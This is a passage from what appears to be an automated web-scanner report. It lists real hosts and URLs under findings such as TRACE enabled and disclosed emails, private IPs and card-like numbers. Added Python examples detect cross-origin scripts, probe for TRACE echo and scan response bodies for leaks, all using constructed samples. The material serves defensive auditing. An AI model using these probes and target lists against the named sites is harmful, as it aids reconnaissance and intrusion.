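        if tag != "script":
            return
        attr_map = dict(attrs)
        src = attr_map.get("src")
        if src:
            self.srcs.append((src, attr_map.get("integrity")))


def _origin(url):
    """(scheme, host, port); default ports normalised so http://a.test and
    http://a.test:80 compare equal."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port or {"http": 80, "https": 443}.get(scheme)
    return scheme, host, port


def cross_domain_scripts(page_url, html):
    """Return one dict per script loaded from an origin other than the page's.

    Relative and protocol-relative src values are resolved against page_url
    first, so only genuinely third-party includes are reported.
    """
    collector = _ScriptSrcCollector()
    collector.feed(html)
    page_origin = _origin(page_url)
    findings = []
    for src, integrity in collector.srcs:
        absolute = urljoin(page_url, src)
        if _origin(absolute) != page_origin:
            findings.append({
                "src": absolute,
                "host": urlsplit(absolute).hostname,
                "sri": integrity is not None,
            })
    return findings


# Constructed sample page; hostnames are placeholders, not sites from the report.
SAMPLE_PAGE_URL = "http://www.example.com/news/"
SAMPLE_HTML = """
<html><head>
<script src="/js/site.js"></script>
<script src="//static.example.com/lib.js"></script>
<script src="http://ads.example-adnetwork.net/tag.js"></script>
<script src="https://cdn.example-cdn.org/jquery.min.js"
        integrity="sha384-AAAA"></script>
<script>var inline = 1;</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for f in cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{f['host']:30} SRI={'yes' if f['sri'] else 'no '} {f['src']}")
```

A different host on the same registrable domain (static.example.com for www.example.com) is still reported, because it is still a distinct origin; whether that counts as a risk depends on who operates that host. SRI only helps for static, versioned files, which is why ad tags and social widgets almost never carry it.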

19. TRACE method is enabled

19.1. http://72.3.253.234/

19.2. http://ads.pubmatic.com/

19.3. http://afe.specificclick.net/

19.4. http://amch.questionmarket.com/

19.5. http://aud.pubmatic.com/

19.6. http://beta.abc.go.com/

19.7. http://bh.heraldinteractive.com/

19.8. http://bigapple.contextuads.com/

19.9. http://bp.specificclick.net/

19.10. http://cache.specificmedia.com/

19.11. http://cdn.video.abc.com/

19.12. http://cheetah.vizu.com/

19.13. http://dp.33across.com/

19.14. http://gallery.pictopia.com/

19.15. http://image2.pubmatic.com/

19.16. http://imp.fetchback.com/

19.17. http://mi.adinterax.com/

19.18. http://ping.crowdscience.com/

19.19. http://pixel.33across.com/

19.20. http://puma.vizu.com/

19.21. http://q1.checkm8.com/

19.22. http://qa.n7.vp2.abc.go.com/

19.23. http://rt.legolas-media.com/

19.24. http://sensor2.suitesmart.com/

19.25. http://t.mookie1.com/

19.26. http://track.pubmatic.com/

19.27. http://usadmm.dotomi.com/

19.28. http://widgets.outbrain.com/

19.29. http://www.4info.com/

19.30. http://www.kaltura.com/

19.31. https://www.mailjet.com/

19.32. http://www.tmz.com/
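The "TRACE method is enabled" entries above are the cross-site tracing (XST) primitive: a server that honours TRACE answers 200 with Content-Type message/http and echoes the request, headers and cookies included. The following is an added example, not code from the XSS.CX report: it builds a TRACE probe carrying a random marker header and then decides from the raw response whether that marker was reflected, so a server that returns a generic 200 page for unknown methods is not misreported. The two responses at the bottom are constructed, not captured from any host listed.

```python
"""Check whether an HTTP server honours the TRACE method."""
import secrets
import socket


def build_trace_request(host, path="/", marker=None):
    """Return (raw_request_bytes, marker). The marker is a random header value
    that only a server echoing the request could know to send back."""
    marker = marker or secrets.token_hex(8)
    lines = [
        f"TRACE {path} HTTP/1.1",
        f"Host: {host}",
        f"X-Trace-Probe: {marker}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii"), marker


def trace_enabled(raw_response, marker):
    """Decide from a raw HTTP response whether TRACE was honoured.

    All three must hold: status 200, Content-Type message/http, and the probe
    marker present in the body. A 200 without the marker (a custom error page)
    or a 405/501 means TRACE is not available on this host.
    """
    head, sep, body = raw_response.partition(b"\r\n\r\n")
    if not sep:
        return False
    lines = head.split(b"\r\n")
    status_parts = lines[0].split(b" ", 2)
    if len(status_parts) < 2 or status_parts[1] != b"200":
        return False
    content_type = b""
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-type":
            content_type = value.strip().lower()
    return content_type.startswith(b"message/http") and marker.encode("ascii") in body


def probe(host, port=80, path="/", timeout=5.0):
    """Send the probe over plain TCP and evaluate the reply. For HTTPS hosts
    wrap the socket with ssl.create_default_context().wrap_socket(...) first."""
    request, marker = build_trace_request(host, path)
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return trace_enabled(b"".join(chunks), marker)


# Constructed responses for offline use; not captured from any host in the report.
ECHOING_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\nConnection: close\r\n\r\n"
    b"TRACE / HTTP/1.1\r\nHost: target.test\r\nX-Trace-Probe: deadbeefcafef00d\r\n"
    b"Connection: close\r\n\r\n"
)
REFUSING_RESPONSE = (
    b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n"
    b"Content-Type: text/html\r\n\r\n<html>405</html>"
)

if __name__ == "__main__":
    print("echoing server  ->", trace_enabled(ECHOING_RESPONSE, "deadbeefcafef00d"))
    print("refusing server ->", trace_enabled(REFUSING_RESPONSE, "deadbeefcafef00d"))
```

The practical weight of this finding is lower than it once was: browsers refuse to issue TRACE from XMLHttpRequest or fetch, so the classic cookie-theft chain needs a non-browser client or a proxy in the path. It remains worth disabling (TraceEnable off in Apache, or the equivalent), because the echo also leaks any headers a front-end proxy adds.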

20. Email addresses disclosed

20.1. http://a.abc.com/service/gremlin/js/files/s_code.js

20.2. http://advancedvoip.com/

20.3. http://bostonherald.com/news/regional/view.bg

20.4. http://bostonherald.com/projects/your_tax_dollars.bg

20.5. http://bostonherald.com/track/inside_track/view.bg

20.6. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/

20.7. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx

20.8. http://cache2-scripts.pressdisplay.com/res/services/ResourceManagerHandler.ashx

20.9. http://duckduckgo.com/d.js

20.10. http://dw1.s81c.com/developerworks/js/jquery/cluetip98/jquery.hoverIntent.minified.js

20.11. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

20.12. http://freeradius.org/faq/cistron.html

20.13. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html

20.14. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html

20.15. http://info.mailtraq.com/wac

20.16. http://l.yimg.com/a/combo

20.17. http://livechat.iadvize.com/chat_init.js

20.18. http://mi.adinterax.com/customer/yahoohouse/4/SapientTest/Yahoo_IM/.ob/IM_425x600.flv.hi.video.mp4

20.19. http://vads.adbrite.com/vast/adserver

20.20. http://vads.adbrite.com/vast/adserver

20.21. http://vads.adbrite.com/vast/adserver

20.22. http://vads.adbrite.com/vast/adserver

20.23. http://vads.adbrite.com/vast/adserver

20.24. http://vads.adbrite.com/vast/adserver

20.25. http://vads.adbrite.com/vast/adserver

20.26. http://vads.adbrite.com/vast/adserver

20.27. http://vads.adbrite.com/vast/adserver

20.28. http://www-01.ibm.com/support/docview.wss

20.29. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html

20.30. http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html

20.31. http://www.alepo.com/javascript/validation.js

20.32. http://www.aradial.com/

20.33. http://www.aradial.com/aradial-radius-server-billing-corporate.html

20.34. http://www.aradial.com/aradial-radius-server-billing-customers.html

20.35. http://www.aradial.com/aradial-radius-server-billing-home-content.html

20.36. http://www.astac.net/

20.37. http://www.astac.net/js/extjs/adapter/jquery/ext-jquery-adapter.js

20.38. http://www.astac.net/js/extjs/ext-all.js

20.39. http://www.astac.net/js/extjs/resources/css/ext-all.css

20.40. http://www.bradsdeals.com/res/opt/global.js

20.41. http://www.desktone.com/

20.42. http://www.desktone.com/sup/js/lib/colorbox/jquery.colorbox-min.js

20.43. http://www.disenter.com/

20.44. http://www.enstarllc.com/

20.45. http://www.google.com/search

20.46. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.dimensions.min.js

20.47. http://www.ibm.com/developerworks/js/jquery/cluetipdwtag/jquery.hoverIntent.minified.js

20.48. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

20.49. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

20.50. http://www.itoncommand.com/Awards.aspx

20.51. http://www.itoncommand.com/CaseStudies.aspx

20.52. http://www.itoncommand.com/Downloads.aspx

20.53. http://www.itoncommand.com/GetAQuote.aspx

20.54. http://www.itoncommand.com/Login.aspx

20.55. http://www.itoncommand.com/Products.aspx

20.56. http://www.itoncommand.com/Support.aspx

20.57. http://www.itoncommand.com/WhyIToC.aspx

20.58. http://www.itoncommand.com/demo/xxxx_main.html

20.59. http://www.itoncommand.com/hosteddesktop.aspx

20.60. http://www.kaltura.com//api_v3/index.php

20.61. http://www.matrix42.com/downloads/wp-vdi-demystified/

20.62. http://www.matrix42.com/typo3/sysext/cms/tslib/media/scripts/jsfunc.layermenu.js

20.63. http://www.microsenseindia.com/js/jcarousellite_1.0.1.js

20.64. http://www.mitzmara.com/

20.65. http://www.mitzmara.com/media%20relations.htm

20.66. http://www.open.com.au/cgi-bin/sf.cgi

20.67. http://www.open.com.au/howtobuy.html

20.68. http://www.open.com.au/index.html

20.69. http://www.open.com.au/radiator/

20.70. http://www.open.com.au/radiator/downloads.html

20.71. http://www.open.com.au/radiator/evaluation.html

20.72. http://www.open.com.au/radiator/features.html

20.73. http://www.open.com.au/services.html

20.74. https://www.open.com.au/cgi-bin/sf.cgi

20.75. https://www.open.com.au/onlineorder.php

20.76. http://www.radius-server.com/

20.77. http://www.radius-server.com/products.htm

20.78. http://www.radius-server.net/

20.79. http://www.radius-server.net/aradial-radius-server-billing-customers.html

20.80. http://www.radius-server.net/aradial-radius-server-billing-home-content.html

20.81. http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html

20.82. http://www.radius-server.net/aradial-radius-server-billing-partners.html

20.83. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html

20.84. http://www.radius-server.net/blank-inner.html

20.85. http://www.radius-server.net/radius-billing.html

20.86. http://www.radius.cistron.nl/

20.87. http://www.radius.cistron.nl/README.pam

20.88. http://www.spotngo.ca/

20.89. http://www.spotngo.ca/services.htm

20.90. http://www.ted.com/css/global.css

20.91. http://www.teranews.com/faq.html

20.92. https://www.thundernews.com/common/js/common.js

20.93. http://www.usenetserver.com/en/support.php

20.94. http://www.vm.ibm.com/search/search.cgi

20.95. http://www.westhost.com/js/jquery.hoverIntent.js

21. Private IP addresses disclosed

21.1. http://api.facebook.com/restserver.php

21.2. http://beta.abc.go.com/shows/charlies-angels

21.3. http://beta.abc.go.com/shows/charlies-angels/bios

21.4. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french

21.5. http://cdnbakmi.kaltura.com/html5/html5lib/org/mwEmbedLoader.php

21.6. http://external.ak.fbcdn.net/safe_image.php

21.7. http://external.ak.fbcdn.net/safe_image.php

21.8. http://external.ak.fbcdn.net/safe_image.php

21.9. http://external.ak.fbcdn.net/safe_image.php

21.10. http://external.ak.fbcdn.net/safe_image.php

21.11. http://external.ak.fbcdn.net/safe_image.php

21.12. http://external.ak.fbcdn.net/safe_image.php

21.13. http://external.ak.fbcdn.net/safe_image.php

21.14. http://freeradius.org/faq/cistron.html

21.15. http://q1.checkm8.com/adam/detect

21.16. http://q1.checkm8.com/adam/detect

21.17. http://q1.checkm8.com/adam/detect

21.18. http://q1.checkm8.com/adam/detect

21.19. http://q1.checkm8.com/adam/detect

21.20. http://q1.checkm8.com/adam/report

21.21. http://q1digital.checkm8.com/adam/cm8adam_1_call.js

21.22. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css

21.23. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css

21.24. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/tRfGGwGuu8y.css

21.25. http://wiki.freeradius.org/FAQ

21.26. http://www.facebook.com/brandlift.php

21.27. http://www.facebook.com/extern/login_status.php

21.28. http://www.facebook.com/extern/login_status.php

21.29. http://www.facebook.com/extern/login_status.php

21.30. http://www.facebook.com/extern/login_status.php

21.31. http://www.facebook.com/extern/login_status.php

21.32. http://www.facebook.com/extern/login_status.php

21.33. http://www.facebook.com/extern/login_status.php

21.34. http://www.facebook.com/extern/login_status.php

21.35. http://www.facebook.com/extern/login_status.php

21.36. http://www.facebook.com/extern/login_status.php

21.37. http://www.facebook.com/extern/login_status.php

21.38. http://www.facebook.com/extern/login_status.php

21.39. http://www.facebook.com/extern/login_status.php

21.40. http://www.facebook.com/extern/login_status.php

21.41. http://www.facebook.com/extern/login_status.php

21.42. http://www.facebook.com/extern/login_status.php

21.43. http://www.facebook.com/extern/login_status.php

21.44. http://www.facebook.com/extern/login_status.php

21.45. http://www.facebook.com/extern/login_status.php

21.46. http://www.facebook.com/extern/login_status.php

21.47. http://www.facebook.com/plugins/activity.php

21.48. http://www.facebook.com/plugins/activity.php

21.49. http://www.facebook.com/plugins/facepile.php

21.50. http://www.facebook.com/plugins/like.php

21.51. http://www.facebook.com/plugins/like.php

21.52. http://www.facebook.com/plugins/like.php

21.53. http://www.facebook.com/plugins/like.php

21.54. http://www.facebook.com/plugins/like.php

21.55. http://www.facebook.com/plugins/like.php

21.56. http://www.facebook.com/plugins/like.php

21.57. http://www.facebook.com/plugins/like.php

21.58. http://www.facebook.com/plugins/like.php

21.59. http://www.facebook.com/plugins/like.php

21.60. http://www.facebook.com/plugins/like.php

21.61. http://www.facebook.com/plugins/like.php

21.62. http://www.facebook.com/plugins/like.php

21.63. http://www.facebook.com/plugins/like.php

21.64. http://www.facebook.com/plugins/like.php

21.65. http://www.facebook.com/plugins/like.php

21.66. http://www.facebook.com/plugins/like.php

21.67. http://www.facebook.com/plugins/like.php

21.68. http://www.facebook.com/plugins/like.php

21.69. http://www.facebook.com/plugins/like.php

21.70. http://www.facebook.com/plugins/like.php

21.71. http://www.facebook.com/plugins/like.php

21.72. http://www.facebook.com/plugins/like.php

21.73. http://www.facebook.com/plugins/like.php

21.74. http://www.facebook.com/plugins/like.php

21.75. http://www.facebook.com/plugins/like.php

21.76. http://www.facebook.com/plugins/like.php

21.77. http://www.facebook.com/plugins/like.php

21.78. http://www.facebook.com/plugins/likebox.php

21.79. http://www.facebook.com/plugins/likebox.php

21.80. http://www.facebook.com/plugins/likebox.php

21.81. http://www.google.com/sdch/sXoKgwNA.dct

22. Credit card numbers disclosed

22.1. http://assets.newsinc.com/flash/widget_toppicks01ps2.xml

22.2. http://showadsak.pubmatic.com/AdServer/AdServerServlet
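Sections 20, 21 and 22 above (e-mail addresses, private IP addresses and credit card numbers disclosed) are all passive checks: pattern matches over response bodies, with no request modified. The following is an added example covering all three, not code from the XSS.CX report or any listed site. The card check is the one a practitioner most needs to understand, because it is the noisiest: it looks for 13 to 19 digit strings that pass the Luhn mod-10 check, and roughly one in ten arbitrary numeric identifiers (ad impression ids, order numbers) passes Luhn by chance, so hits on ad-serving endpoints need manual confirmation before being reported as a leak. The response body below is constructed; the card-like values are synthetic test numbers.

```python
"""Passive information-disclosure checks over an HTTP response body."""
import ipaddress
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
IPV4_RE = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")
# 13-19 digits, optionally separated by single spaces or dashes.
CARD_RE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# RFC 1918 plus loopback and link-local; documentation ranges such as
# 203.0.113.0/24 are deliberately not included.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]


def luhn_valid(digits):
    """Standard Luhn mod-10 check over a string of ASCII digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_emails(body):
    return sorted(set(EMAIL_RE.findall(body)))


def find_private_ips(body):
    """Dotted quads inside PRIVATE_NETS only. Public addresses and octets
    above 255 are dropped; a version string like 1.2.3.4.5 yields 1.2.3.4,
    which is public and therefore not reported."""
    hits = set()
    for candidate in IPV4_RE.findall(body):
        try:
            ip = ipaddress.IPv4Address(candidate)
        except ipaddress.AddressValueError:
            continue
        if any(ip in net for net in PRIVATE_NETS):
            hits.add(str(ip))
    return sorted(hits)


def find_card_like_numbers(body):
    """Digit strings of card length that pass Luhn, separators removed.

    Every hit is a lead, not a confirmed leak: a Luhn-valid string proves the
    check digit is consistent, not that the number was ever issued.
    """
    hits = []
    for m in CARD_RE.finditer(body):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            hits.append(digits)
    return hits


def scan(body):
    return {
        "emails": find_emails(body),
        "private_ips": find_private_ips(body),
        "card_like": find_card_like_numbers(body),
    }


# Constructed response body; all values are synthetic, none come from the report.
SAMPLE_BODY = """
<!-- build host 10.1.2.3, proxy 192.168.100.7, edge 203.0.113.9, local 127.0.0.1 -->
var contact = "webmaster@example.com"; var alt = 'Sales.Team+nl@mail.example.org';
<!-- impression 4111111111111111  bnum 1234567890123452  order 1234567890123456 -->
<!-- ts 20110917123631 -->  version 1.2.3.4.5
"""

if __name__ == "__main__":
    for kind, values in scan(SAMPLE_BODY).items():
        print(f"{kind:12} {values}")
```

In the sample, 4111111111111111 is the well-known Visa test number and 1234567890123452 is a plain sequential identifier with a Luhn-consistent last digit; both are flagged, while 1234567890123456 and the timestamp are not. That is the whole false-positive story behind finding class 22: the scanner cannot tell the two flagged strings apart, so the tester has to.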

23. Robots.txt file

23.1. http://2912a.v.fwmrm.net/crossdomain.xml

23.2. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js

23.3. http://a.tribalfusion.com/j.ad

23.4. http://abc.go.com/shows/charlies-angels

23.5. http://action.media6degrees.com/orbserv/hbpix

23.6. http://ad.afy11.net/ad

23.7. http://ad.auditude.com/adserver

23.8. http://ad.turn.com/server/ads.js

23.9. http://ad.yieldmanager.com/pixel

23.10. http://adm.fwmrm.net/crossdomain.xml

23.11. http://ads.bluelithium.com/pixel

23.12. http://adserver.teracent.net/tase/ad

23.13. http://alerts.4info.com/alert/ads/dispatcher.jsp

23.14. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php

23.15. http://api.bizographics.com/v2/profile.redirect

23.16. http://api.facebook.com/restserver.php

23.17. http://as.casalemedia.com/j

23.18. http://as1.suitesmart.com/99917/G15493.js

23.19. http://at.amgdgt.com/ads/

23.20. http://attwireless-www.baynote.net/baynote/tags3/common

23.21. http://b.voicefive.com/b

23.22. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

23.23. http://beta.abc.go.com/shows/charlies-angels

23.24. http://bh.heraldinteractive.com/includes/processAds.bg

23.25. http://bigapple.contextuads.com/fc/go2.php

23.26. http://bostonherald.com/news/regional/view.bg

23.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.28. http://c.betrad.com/a/n/44/546.js

23.29. http://c.brightcove.com/services/viewer/federated_f9

23.30. http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css

23.31. http://cdn.abc.go.com/crossdomain.xml

23.32. http://cdn.gigya.com/JS/gigya.js

23.33. http://cdn.kaltura.com/crossdomain.xml

23.34. http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf

23.35. http://cdn.media.abc.go.com/m/images/global/generic/logo.png

23.36. http://cdn.optmd.com/V2/80181/197812/index.html

23.37. http://cdn.turn.com/server/ddc.htm

23.38. http://cdnbakmi.kaltura.com/p/591531/sp/59153100/flash/kdp3/v3.5.17.6/kdp3.swf

23.39. http://cheetah.vizu.com/a.gif

23.40. http://cim.meebo.com/cim

23.41. http://clk.atdmt.com/go/335787632/direct

23.42. http://cm.g.doubleclick.net/pixel

23.43. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848

23.44. http://d14.zedo.com/ads6/d/3853/172/951/0/2/i.js

23.45. http://d7.zedo.com/img/bh.gif

23.46. http://dp.33across.com/ps/

23.47. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_4_2/StdBanner.js

23.48. http://g-pixel.invitemedia.com/gmatcher

23.49. http://g.ca.bid.invitemedia.com/pubm_imp

23.50. http://g2.gumgum.com/services/get

23.51. http://gallery.pictopia.com/bostonherald/

23.52. http://gscounters.gigya.com/gs/api.ashx

23.53. http://imagec12.247realmedia.com/RealMedia/ads/Creatives/BostonHerald/Monster_RON_728x90/Monster_728x90_FINAL.swf/1297456388

23.54. http://imp.fetchback.com/serve/fb/adtag.js

23.55. http://ll.static.abc.com/m/vp2/sfp/prod/v1.0.0/js/abc/sfp2.js

23.56. http://load.exelator.com/load/

23.57. http://loadm.exelator.com/load/

23.58. http://log.go.com/log

23.59. http://map.media6degrees.com/orbserv/aopix

23.60. http://metrics.tmz.com/b/ss/wbrostmz/1/H.20.3/s31416852392721

23.61. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75

23.62. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853

23.63. http://odb.outbrain.com/utils/ping.html

23.64. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

23.65. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.755902.s1.v4.ipv6-exp.l.google.com/gen_204

23.66. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

23.67. http://pixel.33across.com/ps/517389/

23.68. http://pixel.invitemedia.com/data_sync

23.69. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml

23.70. http://puma.vizu.com/cdn/00/00/23/91/smart_tag.js

23.71. http://q1.checkm8.com/adam/detect

23.72. http://qa.n7.vp2.abc.go.com/crossdomain.xml

23.73. http://r.casalemedia.com/j.gif

23.74. http://r.turn.com/r/beacon

23.75. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

23.76. http://r1.zedo.com/log/ERR.gif

23.77. http://rds.yahoo.com/b.gif

23.78. http://rt.legolas-media.com/lgrt

23.79. http://rt1302.infolinks.com/crossdomain.xml

23.80. http://rt1701.infolinks.com/crossdomain.xml

23.81. http://rt1702.infolinks.com/crossdomain.xml

23.82. http://rt1803.infolinks.com/crossdomain.xml

23.83. http://rt1804.infolinks.com/static/blank.html

23.84. http://rt1903.infolinks.com/crossdomain.xml

23.85. http://s0.2mdn.net/2906542/11dvm_quiltednorthern_banners_300x250.swf

23.86. http://sana.newsinc.com/sana.html

23.87. http://search.yahoo.com/search

23.88. http://segment-pixel.invitemedia.com/pixel

23.89. http://sensor2.suitesmart.com/sensor4.js

23.90. http://servedby.flashtalking.com/imp/3/16718

23.91. http://site.abc.go.com/crossdomain.xml

23.92. http://spe.atdmt.com/ds/WURTCBIOGTYS/TYS_WayneDeepa_Banner/TYS219_WayneDeepa_300x250.swf

23.93. http://static-gallery.pictopia.com.edgesuite.net/providerasset/1081/bherald_style.css

23.94. http://stats.kaltura.com/crossdomain.xml

23.95. http://traffic.outbrain.com/network/redir

23.96. http://trk.vindicosuite.com/Tracking/V3/Instream/Impression/

23.97. http://us.adserver.yahoo.com/a

23.98. http://usadmm.dotomi.com/dmm/servlet/dmm

23.99. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674

23.100. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

23.101. http://www.4info.com/js/auto_jump.js

23.102. http://www.att.com/u-verse/availability/

23.103. http://www.bostonherald.com/news/

23.104. http://www.bradsdeals.com/dealsoftheday/subscribe/b

23.105. http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu

23.106. http://www.meebo.com/cim/sandbox.php

23.107. http://www.tmz.com/

24. Cacheable HTTPS response

24.1. https://admin.usenetbinaries.com/cgi-bin/signup

24.2. https://admin.usenetbinaries.com/favicon.ico

24.3. https://www.easynews.com/signup/lookit.phtml

24.4. https://www.giganews.com/favicon.ico

24.5. https://www.giganews.com/images/fonts/museo_slab_500-webfont.woff

24.6. https://www.giganews.com/images/fonts/museo_slab_500italic-webfont.woff

24.7. https://www.giganews.com/images/fonts/museosans_500-webfont.woff

24.8. https://www.mailjet.com/signup

24.9. https://www.open.com.au/cgi-bin/sf.cgi

24.10. https://www.open.com.au/favicon.ico

24.11. https://www.open.com.au/onlineorder.php

24.12. https://www.open.com.au/style/osc

24.13. https://www.thundernews.com/favicon.ico

25. Multiple content types specified

26. HTML does not specify charset

26.1. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9

26.2. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106

26.3. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10

26.4. http://ad.doubleclick.net/pfadx/tmz_cim/

26.5. http://ad.yieldmanager.com/iframe3

26.6. http://advancedvoip.com/favicon.ico

26.7. http://advancedvoip.com/images/voip_billing_solution_partner_bp.jpg

26.8. http://aud.pubmatic.com/AdServer/Artemis

26.9. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

26.10. http://bgs-soft.com/Products_Sgagent.html

26.11. http://bgs-soft.com/sgagent/

26.12. http://bh.heraldinteractive.com/includes/processAds.bg

26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.14. http://ca.rtb.prod2.invitemedia.com/build_creative

26.15. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848

26.16. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html

26.17. http://freeradius.org/

26.18. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

26.19. http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html

26.20. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.21. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91

26.22. http://odb.outbrain.com/utils/ping.html

26.23. http://p4.choubllcbxhka.a3wlja2w5g6k7l2x.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

26.24. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

26.25. http://p4.dwoldbj6emar2.ydgi23e62tcrxhhn.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

26.26. http://pixel.invitemedia.com/data_sync

26.27. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtalks_maincontent.gif

26.28. http://s0.wp.com/wp-content/themes/vip/images/bg_wrap_viewtemplate.gif

26.29. http://sana.newsinc.com/sana.html

26.30. http://search.alepo.com/img/onebyone.gif

26.31. http://secure-us.imrworldwide.com/cgi-bin/m

26.32. http://secure-us.imrworldwide.com/ocr/e

26.33. http://sensor2.suitesmart.com/sensor4.js

26.34. http://showadsak.pubmatic.com/AdServer/AdServerServlet

26.35. http://squirrelmail.org/sflogo.html

26.36. http://static.scanscout.com/optout/iframe.html

26.37. http://tag.admeld.com/ad/iframe/221/tmz/728x90/homepage_btf

26.38. http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782

26.39. http://tag.admeld.com/passback/iframe/221/tmz/300x250/6/meld.html

26.40. http://tag.admeld.com/passback/iframe/221/tmz/728x90/6/meld.html

26.41. http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet

26.42. http://uac.advertising.com/wrapper/aceUACping.htm

26.43. http://widgets.mobilelocalnews.com/

26.44. http://www-03.ibm.com/innovation/us/watson/

26.45. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/index.html

26.46. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/smarter-answers-for-a-smarter-planet.html

26.47. http://www-03.ibm.com/innovation/us/watson/watson-for-a-smarter-planet/watson-schematic.html

26.48. http://www.advancedvoip.com/favicon.ico

26.49. http://www.advancedvoip.com/images/voip_billing_solution_partner_bp.jpg

26.50. http://www.alepo.com/isp-billing.shtml

26.51. http://www.alepo.com/radius-server.shtml

26.52. http://www.alepo.com/wifi.shtml

26.53. http://www.aradial.com/

26.54. http://www.aradial.com/aradial-radius-server-billing-corporate.html

26.55. http://www.aradial.com/aradial-radius-server-billing-customers.html

26.56. http://www.aradial.com/aradial-radius-server-billing-home-content.html

26.57. http://www.aradial.com/favicon.ico

26.58. http://www.att.com/navservice/navservlet

26.59. http://www.bostonheraldineducation.com/blog-posts.php

